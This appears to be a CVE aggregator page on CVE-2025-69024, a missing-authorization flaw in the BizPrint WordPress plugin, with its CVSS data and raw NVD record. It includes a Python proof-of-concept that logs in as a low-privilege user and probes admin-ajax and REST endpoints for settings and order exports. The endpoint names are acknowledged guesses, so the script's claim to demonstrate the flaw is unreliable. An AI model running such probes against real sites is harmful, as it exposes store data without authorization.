Security Vulnerability Report
中文
CVE-2025-69024 CVSS 6.5 MEDIUM

CVE-2025-69024

Published: 2025-12-30 11:16:01
Last Modified: 2026-04-27 20:16:25

Description

Missing Authorization vulnerability in bizswoop BizPrint print-google-cloud-print-gcp-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BizPrint: from n/a through <= 4.6.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BizPrint (print-google-cloud-print-gcp-woocommerce) <= 4.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69024 PoC - BizPrint Plugin Broken Access Control # This PoC demonstrates the missing authorization vulnerability # Requires a low-privilege WordPress account import requests import sys TARGET_URL = "https://target-site.com" USERNAME = "low_privilege_user" PASSWORD = "password" def get_auth_cookie(): """Login to WordPress and get authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In" } session = requests.Session() response = session.post(login_url, data=data) return session.cookies.get_dict() def exploit_broken_access_control(cookies): """ Exploit the missing authorization vulnerability Try to access admin-only BizPrint functionality """ # Common BizPrint endpoints that might be vulnerable vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bizprint_get_settings", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=bizprint_export_orders", f"{TARGET_URL}/wp-json/bizprint/v1/settings", f"{TARGET_URL}/wp-json/bizprint/v1/orders" ] for endpoint in vulnerable_endpoints: try: response = requests.get(endpoint, cookies=cookies, timeout=10) if response.status_code == 200 and "application/json" in response.headers.get("Content-Type", ""): print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[-] No vulnerable endpoints found or PoC needs adjustment") return False if __name__ == "__main__": print("[*] CVE-2025-69024 - BizPrint Missing Authorization PoC") print("[*] Target: WordPress with BizPrint plugin <= 4.6.7") cookies = get_auth_cookie() if cookies: print("[+] Successfully authenticated with low-privilege account") exploit_broken_access_control(cookies) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69024", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:00.880", "lastModified": "2026-04-27T20:16:25.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in bizswoop BizPrint print-google-cloud-print-gcp-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects BizPrint: from n/a through <= 4.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/print-google-cloud-print-gcp-woocommerce/vulnerability/wordpress-bizprint-plugin-4-6-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}